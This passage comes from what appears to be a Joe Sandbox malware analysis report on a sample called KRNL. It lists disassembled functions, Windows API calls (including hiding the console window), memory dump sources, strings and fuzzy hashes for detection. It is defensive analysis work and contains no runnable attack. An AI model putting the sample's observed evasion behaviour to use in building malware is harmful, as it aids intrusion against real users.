                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                                                                                                                                          • String ID: e.q
                                                                                                                                                                                                                                                          • API String ID: 3087743877-2639829087
                                                                                                                                                                                                                                                          • Opcode ID: 46f7a660d1d7ba914c4511f4953c0d7591864ab454aec560f9ee095b921ec09a
                                                                                                                                                                                                                                                          • Instruction ID: 1f729a07bbbb5adc5d9fdeb5a5269754e35ec728f4d795bcd7b305397da966ec
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 46f7a660d1d7ba914c4511f4953c0d7591864ab454aec560f9ee095b921ec09a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0413971D013648FCB10DF99D845BAEB7B2FF44B20F188219D8156B391DB79AA01CF95
                                                                                                                                                                                                                                                          Function 006E24B0 Relevance: 10.6, APIs: 7, Instructions: 83threadCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 006E24DD
                                                                                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 006E24E6
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006E2524
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,006E253A,?,?,00000000), ref: 006EF129
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,006E253A,?,?,00000000), ref: 006EF142
                                                                                                                                                                                                                                                            • Part of subcall function 006EF11D: CloseHandle.KERNEL32(?,?,?,006E253A,?,?,00000000), ref: 006EF154
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2567
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2578
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E2589
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E259A
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3956949563-0
                                                                                                                                                                                                                                                          • Opcode ID: db3df0507b55c3079353c8bc4b00bcd022eb4bc768ff1bf4667a667eabde5eff
                                                                                                                                                                                                                                                          • Instruction ID: fa8da950fbd48eda3c8cdc4c0d6502c1009abf29ead60990ac50d5af12390bcb
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db3df0507b55c3079353c8bc4b00bcd022eb4bc768ff1bf4667a667eabde5eff
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9821A5F2D413959BDF50AF959D07BDE7BBAAF04710F080128F60476281E7B6A504C6A6
                                                                                                                                                                                                                                                          Function 006FCF0B Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,?,?,?,BB40E64E,?,006FD01A,006E1170,006EAA08,?,?), ref: 006FCFCC
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                          • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                          • Opcode ID: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
                                                                                                                                                                                                                                                          • Instruction ID: 794264b3dd513a880de7a660db47844131e8426facfd5debb747b33aefa0c95a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 21038a4c6a263bb1b9d6a63042490184febd2546351c5734fa47e0009f45b87d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3721F631A02219ABCB218B68ED41AEAB75B9F457B0F254111FA59A73D0D774ED00CAD0
                                                                                                                                                                                                                                                          Function 006F0080 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 15libraryloaderCOMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 006F0086
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 006F0094
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 006F00A5
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                          • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                          • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                          • Opcode ID: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
                                                                                                                                                                                                                                                          • Instruction ID: e9b8ae64561f45ce0c7949f3ae10230d7d786c665f964b454091b45a6a29c701
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1d8798a295572aa36238ed6d6de65352cac2dfe8ecd2a3bb54ac44ab1b5d945d
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FCD09EBA5522106B83115FBC7C09CC93EA9FA09711301C152F441E22D0DA7C65419AED
                                                                                                                                                                                                                                                          Function 00704F81 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                          • Opcode ID: 6e7c8fb666d9271c7d6cda6f98311830b881a333037df84a71feff34bd29dbe2
                                                                                                                                                                                                                                                          • Instruction ID: 8cf2d19bb5e8a2ad2b5e2a5776c6eaf0bd55c6c08583ad03aab2436cacb0edfe
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e7c8fb666d9271c7d6cda6f98311830b881a333037df84a71feff34bd29dbe2
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0DB1E1B4A04A49EFDB11DFA8D840BBEBBF1BF49304F148258E900972C2C7799941CFA4
                                                                                                                                                                                                                                                          Function 006E9B30 Relevance: 9.1, APIs: 6, Instructions: 125COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9C97
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CA8
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CBC
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CDD
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9CEE
                                                                                                                                                                                                                                                          • std::_Throw_Cpp_error.LIBCPMT ref: 006E9D06
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: Cpp_errorThrow_std::_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 2134207285-0
                                                                                                                                                                                                                                                          • Opcode ID: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction ID: 9320267bc15885780e24f8158d8190e29c47d907da69b4f21adf2af9b52efddc
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e5fab6b2c589da800f67e20cfb920f36e95ffa60d82340013dc1bd73cdef1b67
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FE41F5B0902780CBDB30AB6289067EFB7F6AF45724F28062DD57A163D1D3316904CB66
                                                                                                                                                                                                                                                          Function 006FACE7 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,006FACDE,006F0760,006EB77F,BB40E64E,?,?,?,?,0070BFCA,000000FF), ref: 006FACF5
                                                                                                                                                                                                                                                          • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 006FAD03
                                                                                                                                                                                                                                                          • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 006FAD1C
                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,?,006FACDE,006F0760,006EB77F,BB40E64E,?,?,?,?,0070BFCA,000000FF), ref: 006FAD6E
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3852720340-0
                                                                                                                                                                                                                                                          • Opcode ID: 1be3106652f0810daad1cc47e7f5f2c5ac002a2d50be5124eeef8d2fa8c3fb60
                                                                                                                                                                                                                                                          • Instruction ID: ff97f8ed4bc408cf8d7c3fc3b2ad54830fc3a6f8cf20cc3f292b8784dfa646e1
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1be3106652f0810daad1cc47e7f5f2c5ac002a2d50be5124eeef8d2fa8c3fb60
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC01F57220A619DEE7242AB87C498B626C6EF06B75720833AF714457F0EF1558039555
                                                                                                                                                                                                                                                          Function 006FB56E Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 301COMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • type_info::operator==.LIBVCRUNTIME ref: 006FB68D
                                                                                                                                                                                                                                                          • CallUnexpected.LIBVCRUNTIME ref: 006FB906
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                          • String ID: csm$csm$csm
                                                                                                                                                                                                                                                          • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                          • Opcode ID: 20814496bd6f9ac2f7d51ead898cb949de318e68fe10d71cd96b549c7deaa051
                                                                                                                                                                                                                                                          • Instruction ID: ac47d030443d3a466e2c7c2c504038bfed802992aabd5bc1c8715c08c71212a4
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 20814496bd6f9ac2f7d51ead898cb949de318e68fe10d71cd96b549c7deaa051
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 79B1677580020DEFCF14DFA4C8819BEBBBABF44310B14555AEA25AB212D731DA51CF96
                                                                                                                                                                                                                                                          Function 004284C0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 98COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,?), ref: 00428577
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915370976.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_KRNL.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                          • String ID: B]C]$B]V]$S%1e$S%1e
                                                                                                                                                                                                                                                          • API String ID: 237503144-91396555
                                                                                                                                                                                                                                                          • Opcode ID: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                                          • Instruction ID: 8746a14ed2116129ecf6ab586aa45845e2b2ebc96e851e8bdc8583723b65a5bd
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7fd0bbd5d6f31a729f27431df120334829b1dedf336d013a1b80b2b09c62a36b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED21057260C3255FE328CF25D8557ABF2E7EFC5700F11C83D95899B2D1DAB08446879A
                                                                                                                                                                                                                                                          Function 006EBE95 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EBF44
                                                                                                                                                                                                                                                          • std::_Ref_count_base::_Decref.LIBCPMT ref: 006EC028
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: DecrefRef_count_base::_std::_
                                                                                                                                                                                                                                                          • String ID: MOC$RCC$csm
                                                                                                                                                                                                                                                          • API String ID: 1456557076-2671469338
                                                                                                                                                                                                                                                          • Opcode ID: 7070c2e221e4fbf7c36a6feeb4969da593fee8b7e4be1f7d568f7bdbcca64c59
                                                                                                                                                                                                                                                          • Instruction ID: 80d1008a47589e5fec60db716430fb67a448bf0da8ac3d053a67c16db8a92f1a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7070c2e221e4fbf7c36a6feeb4969da593fee8b7e4be1f7d568f7bdbcca64c59
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1241CE34902388DFCF28DF6AD945AAFB7B6BF44300B68906DE045A7742C734AA05CF55
                                                                                                                                                                                                                                                          Function 006F55C4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,0070BE94,000000FF,?,006F5685,?,?,006F5721,00000000), ref: 006F55F9
                                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006F560B
                                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,00000000,0070BE94,000000FF,?,006F5685,?,?,006F5721,00000000), ref: 006F562D
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                          • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                          • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                          • Opcode ID: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
                                                                                                                                                                                                                                                          • Instruction ID: 3bab834c2e031fdaa1c95afc75f8726b03673c70e9459ab87e9cfc4dc0d0f2c0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c2082092b1bb25e83b11f16d5ceef1813ba1fc995de19d4cc7a234b6cbf34af1
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E016771540A19EFDB118F58DC09BEEBBB9FB04B15F018525F921E22E0DB789D00CA94
                                                                                                                                                                                                                                                          Function 006FD6EA Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD76F
                                                                                                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 006FD838
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD89F
                                                                                                                                                                                                                                                            • Part of subcall function 006FBF11: HeapAlloc.KERNEL32(00000000,00000018,00000000,?,006EA67D,00000018,?,006E3D4A,00000018,00000000), ref: 006FBF43
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8B2
                                                                                                                                                                                                                                                          • __freea.LIBCMT ref: 006FD8BF
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000002.00000002.2915430184.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915416241.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915496117.000000000070D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915514916.000000000071A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915531731.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915547193.0000000000722000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          • Associated: 00000002.00000002.2915576568.000000000076D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6e0000_KRNL.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 1096550386-0
                                                                                                                                                                                                                                                          • Opcode ID: bb54ce4c3091b957c4e278a84252753b620442c7112fec1d2a3df5ca0bf94daa
                                                                                                                                                                                                                                                          • Instruction ID: 2c19cfb39e9bada7a974c9f23f455b40d615caffa5220fc26033e33459bd7f10
